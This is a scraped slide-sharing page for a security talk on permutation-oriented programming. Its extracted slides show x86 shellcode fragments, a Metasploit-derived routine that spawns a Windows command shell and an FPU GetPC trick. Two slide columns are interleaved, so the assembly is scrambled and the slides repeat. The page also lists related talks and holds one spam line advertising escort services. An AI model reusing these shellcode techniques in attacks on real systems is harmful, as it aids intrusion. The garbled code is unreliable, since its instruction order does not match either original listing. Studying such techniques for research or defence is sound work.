   xor    esi, esi                                      push edi
   push   byte 18                                       push edi
   pop    ecx                                           xor esi, esi
                                                        push byte 18
 Code by Stephen Fewer (Harmony Security) and part      pop ecx
 of Metasploit Framework.

                                                      Ideas by sk (SCAN Associates Berhad), and published
                                                      on Phrack Magazine (issue 62, file 7).

                                                      Demonstrated on H2HC 6th Edition (2009).
Shellcode


Shoryuken (昇龍拳)                                        FPU GetPC
shell:                                                 fnstenv_getpc PROC
   call shell_set_cmd                                  ; Could be fld1, fldl2t, fldl2e,
   db   “CMD /k set DIRCMD=/b”, 0
                                                       ; fldz, fldlg2 or fldln2.
shell_set_cmd:
   pop ebx                                                    fldpi
   push edi                                                   fnstenv [esp - 0Ch]
   push edi                                                   pop eax
   push edi                                                   add byte ptr [eax], 0Ah
   xor esi, esi
                                                          assembly:
   push byte 18
   pop ecx                                             fnstenv_getpc ENDP

 Ideas by sk (SCAN Associates Berhad), and published    Ideas by Aaron Adams, and published on VULN-DEV
 on Phrack Magazine (issue 62, file 7).                 (November 18th, 2003).

 Demonstrated on H2HC 6th Edition (2009).               Demonstrated on H2HC 6th Edition (2009).
Shellcode


Shoryuken (昇龍拳)                                        FPU GetPC
shell:                                                 fnstenv_getpc PROC
   call shell_set_cmd                                  ; Could be fld1, fldl2t, fldl2e,
   db   “CMD /k set DIRCMD=/b”, 0
                                                       ; fldz, fldlg2 or fldln2.
shell_set_cmd:
   pop ebx                                                    fldpi
   push edi                                                   fnstenv [esp - 0Ch]
   push edi                                                   pop eax
   push edi                                                   add byte ptr [eax], 0Ah
   xor esi, esi
                                                          assembly:
   push byte 18
   pop ecx                                             fnstenv_getpc ENDP

 Ideas by sk (SCAN Associates Berhad), and published    Ideas by Aaron Adams, and published on VULN-DEV
 on Phrack Magazine (issue 62, file 7).                 (November 18th, 2003).

 Demonstrated on H2HC 6th Edition (2009).               Demonstrated on H2HC 6th Edition (2009).
"ENG++: Permutation Oriented Programming" por Nelson Brito
What demo?




  NO DEMONSTRATION
But you can test by yourselves!!!
What demo?
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito

More Related Content

Viewers also liked

Ferramentas para Resposta a Incidentes - ago12
Ferramentas para Resposta a Incidentes - ago12Ferramentas para Resposta a Incidentes - ago12
Ferramentas para Resposta a Incidentes - ago12
Luiz Sales Rabelo
 
Cuidados no processo pericial em tablets e smartphones
Cuidados no processo pericial em tablets e smartphonesCuidados no processo pericial em tablets e smartphones
Cuidados no processo pericial em tablets e smartphones
Data Security
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
SegInfo
 
Guerra cibernética - Impacta
Guerra cibernética - ImpactaGuerra cibernética - Impacta
Guerra cibernética - Impacta
Luiz Sales Rabelo
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus Impacta
Luiz Sales Rabelo
 
Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012
Luiz Sales Rabelo
 
Midiakit SegInfo 2015
Midiakit SegInfo 2015Midiakit SegInfo 2015
Midiakit SegInfo 2015
SegInfo
 
Processo investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaProcesso investigativo - Faculdader Impacta
Processo investigativo - Faculdader Impacta
Luiz Sales Rabelo
 
A Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraA Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan Bonagura
SegInfo
 
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
SegInfo
 
CNASI 2011
CNASI 2011CNASI 2011
CNASI 2011
Luiz Sales Rabelo
 
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Junior Abreu
 
Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012
Luiz Sales Rabelo
 
Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013
SegInfo
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
SegInfo
 
Começando um Pequeno & Grande Negócio
Começando um Pequeno & Grande NegócioComeçando um Pequeno & Grande Negócio
Começando um Pequeno & Grande Negócio
Junior Abreu
 
Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição
SegInfo
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoRede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Junior Abreu
 
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
SegInfo
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
SegInfo
 

Viewers also liked (20)

Ferramentas para Resposta a Incidentes - ago12
Ferramentas para Resposta a Incidentes - ago12Ferramentas para Resposta a Incidentes - ago12
Ferramentas para Resposta a Incidentes - ago12
 
Cuidados no processo pericial em tablets e smartphones
Cuidados no processo pericial em tablets e smartphonesCuidados no processo pericial em tablets e smartphones
Cuidados no processo pericial em tablets e smartphones
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
 
Guerra cibernética - Impacta
Guerra cibernética - ImpactaGuerra cibernética - Impacta
Guerra cibernética - Impacta
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus Impacta
 
Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012
 
Midiakit SegInfo 2015
Midiakit SegInfo 2015Midiakit SegInfo 2015
Midiakit SegInfo 2015
 
Processo investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaProcesso investigativo - Faculdader Impacta
Processo investigativo - Faculdader Impacta
 
A Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraA Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan Bonagura
 
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
 
CNASI 2011
CNASI 2011CNASI 2011
CNASI 2011
 
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
 
Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012
 
Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
Começando um Pequeno & Grande Negócio
Começando um Pequeno & Grande NegócioComeçando um Pequeno & Grande Negócio
Começando um Pequeno & Grande Negócio
 
Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoRede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
 
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
 

Similar to "ENG++: Permutation Oriented Programming" por Nelson Brito

Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson BritoVale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference
 
[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®
Nelson Brito
 
Doten apt presentaiton (2)
Doten apt presentaiton (2)Doten apt presentaiton (2)
Doten apt presentaiton (2)
Jeff Green
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testers
Felipe Prado
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
Claus Cramon Houmann
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2
Claus Cramon Houmann
 
Vulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldVulnerability Management In An Application Security World
Vulnerability Management In An Application Security World
Denim Group
 
Eirtight writing secure code
Eirtight writing secure codeEirtight writing secure code
Eirtight writing secure code
Kieran Dundon
 
Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015
Claus Cramon Houmann
 
Truth and Consequences
Truth and ConsequencesTruth and Consequences
Truth and Consequences
Mohammed Almeshekah
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
EC-Council
 
Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!
Nelson Brito
 
Iscsp apt
Iscsp aptIscsp apt
Iscsp apt
Joey Hernandez
 
How to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsHow to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOps
Zane Lackey
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
dkaya
 
Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2
Don Kim
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Introduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptxIntroduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptx
MiscAnnoy1
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015
Claus Cramon Houmann
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
Marcin Ludwiszewski
 

Similar to "ENG++: Permutation Oriented Programming" por Nelson Brito (20)

Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson BritoVale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference - 2011 - 13 - Nelson Brito
 
[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®[PH-Neutral 0x7db] Exploit Next Generation®
[PH-Neutral 0x7db] Exploit Next Generation®
 
Doten apt presentaiton (2)
Doten apt presentaiton (2)Doten apt presentaiton (2)
Doten apt presentaiton (2)
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testers
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2
 
Vulnerability Management In An Application Security World
Vulnerability Management In An Application Security WorldVulnerability Management In An Application Security World
Vulnerability Management In An Application Security World
 
Eirtight writing secure code
Eirtight writing secure codeEirtight writing secure code
Eirtight writing secure code
 
Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015Keynote Information Security days Luxembourg 2015
Keynote Information Security days Luxembourg 2015
 
Truth and Consequences
Truth and ConsequencesTruth and Consequences
Truth and Consequences
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!Exploit Next Generation®: Missão dada é missão cumprida!
Exploit Next Generation®: Missão dada é missão cumprida!
 
Iscsp apt
Iscsp aptIscsp apt
Iscsp apt
 
How to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOpsHow to adapt the SDLC to the era of DevSecOps
How to adapt the SDLC to the era of DevSecOps
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
 
Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2Design and Analyze Secure Networked Systems - 2
Design and Analyze Secure Networked Systems - 2
 
Metasploit
MetasploitMetasploit
Metasploit
 
Introduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptxIntroduction to AI Safety (public presentation).pptx
Introduction to AI Safety (public presentation).pptx
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
 

More from SegInfo

Analisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKAnalisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
SegInfo
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBConvite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
SegInfo
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire..."Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
SegInfo
 
"War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira "War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira
SegInfo
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasProteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
SegInfo
 
"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini
SegInfo
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
SegInfo
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
SegInfo
 

More from SegInfo (8)

Analisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKAnalisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBConvite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire..."Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
 
"War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira "War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasProteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
 
"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
 

Recently uploaded

The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
Razin Mustafiz
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
shyamraj55
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
ZachWylie3
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
FIDO Alliance
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
alexjohnson7307
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...
DianaGray10
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
Arpan Buwa
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
Zilliz
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
sunilverma7884
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
Baishakhi Ray
 
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and DisadvantagesBLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
BLOCKCHAIN TECHNOLOGY - Advantages and Disadvantages
SAI KAILASH R
 
Gen AI: Privacy Risks of Large Language Models (LLMs)
Gen AI: Privacy Risks of Large Language Models (LLMs)Gen AI: Privacy Risks of Large Language Models (LLMs)
Gen AI: Privacy Risks of Large Language Models (LLMs)
Debmalya Biswas
 

Recently uploaded (20)

The Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - CoatueThe Path to General-Purpose Robots - Coatue
The Path to General-Purpose Robots - Coatue
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
UX Webinar Series: Essentials for Adopting Passkeys as the Foundation of your...
 
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
leewayhertz.com-Generative AI tech stack Frameworks infrastructure models and...
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
 
How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...How UiPath Discovery Suite supports identification of Agentic Process Automat...
How UiPath Discovery Suite supports identification of Agentic Process Automat...
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
 
